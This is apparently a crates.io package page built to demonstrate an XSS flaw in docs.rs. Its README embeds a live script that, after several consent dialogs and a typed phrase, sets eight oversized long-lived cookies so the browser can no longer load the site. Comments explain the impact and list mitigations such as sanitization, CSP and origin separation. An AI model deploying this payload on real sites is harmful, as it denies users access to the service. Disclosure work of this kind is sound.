3 releases
0.1.2 | Mar 21, 2021 |
---|---|
0.1.1 | Mar 21, 2021 |
0.1.0 | Mar 21, 2021 |
#5 in #demonstration
3KB
🔥🔥🔥🔥🔥🔥🔥🔥🔥🔥🔥🔥🔥🔥🔥🔥🔥🔥🔥🔥🔥🔥🔥🔥🔥🔥🔥🔥🔥🔥🔥🔥🔥🔥🔥🔥🔥🔥🔥🔥🔥🔥🔥🔥🔥🔥
This crate demonstrates an XSS vulnerability in docs.rs. To test, click the link below. The demonstration script stores several large, long-lived cookies for the site, so to access docs.rs afterward you will need to clear your cookies.
🔥🔥🔥🔥🔥🔥🔥🔥🔥🔥🔥🔥🔥🔥🔥🔥🔥🔥🔥🔥🔥🔥🔥🔥🔥🔥🔥🔥🔥🔥🔥🔥🔥🔥🔥🔥🔥🔥🔥🔥🔥🔥🔥🔥🔥🔥
<script>
/**
 * Consent-gated proof of concept showing that script embedded in crate
 * documentation is executed by the page that renders it.
 *
 * Flow: three confirm() dialogs and one typed phrase must all be accepted;
 * declining any of them returns before any browser state is touched. After
 * consent, eight cookies named "a" through "h" are written, each with a
 * 4001-character value, Path=/ and an expiry in the year 9999, and the page
 * is reloaded.
 *
 * Impact, per the dialog text: the site stays unreachable for this browser
 * until its cookies are cleared. NOTE(review): presumably the oversized
 * Cookie header is what the server rejects; that is not shown here, so
 * confirm it against the server's request-header limits.
 *
 * Defensive takeaway: the root cause is untrusted markup being rendered with
 * script enabled. Sanitizing rendered documentation, a Content-Security-Policy
 * that disallows inline script, and serving user-supplied content from an
 * origin separate from the main site each limit what such a script can reach.
 *
 * bootstrap() is only defined here; whatever invokes it is outside this line.
 */
function bootstrap() {
  const warnings = [
    'This is a demonstration of a security vulnerability (XSS). Click CANCEL to abort at any time.',
    'WARNING: If you proceed, you will not be able to access docs.rs. CLICK CANCEL if you do not wish this to happen.',
    'WARNING: To access docs.rs after proceeding, you will need to clear your browser cookies.',
  ];

  // every() stops at the first declined dialog, so later warnings are not
  // shown once the user has cancelled.
  const consented = warnings.every((text) => confirm(text));
  if (!consented) {
    return;
  }

  // A second, typed acknowledgement guards against click-through.
  const requiredPhrase = 'I understand what I need to do';
  const typed = prompt('Type "I understand what I need to do" to continue:');
  if (typed !== requiredPhrase) {
    return;
  }

  // 4001 characters per value: one initial 'z' plus 4000 appended.
  const filler = 'z'.repeat(4001);
  const attributes = '; expires=Fri, 31 Dec 9999 23:59:59 GMT; Path=/';

  // Path=/ makes every cookie accompany each request to the origin, and the
  // far-future expiry keeps them until the user clears them by hand.
  for (const name of ['a', 'b', 'c', 'd', 'e', 'f', 'g', 'h']) {
    document.cookie = `${name}=${filler}${attributes}`;
  }

  window.location.reload();
}
</script>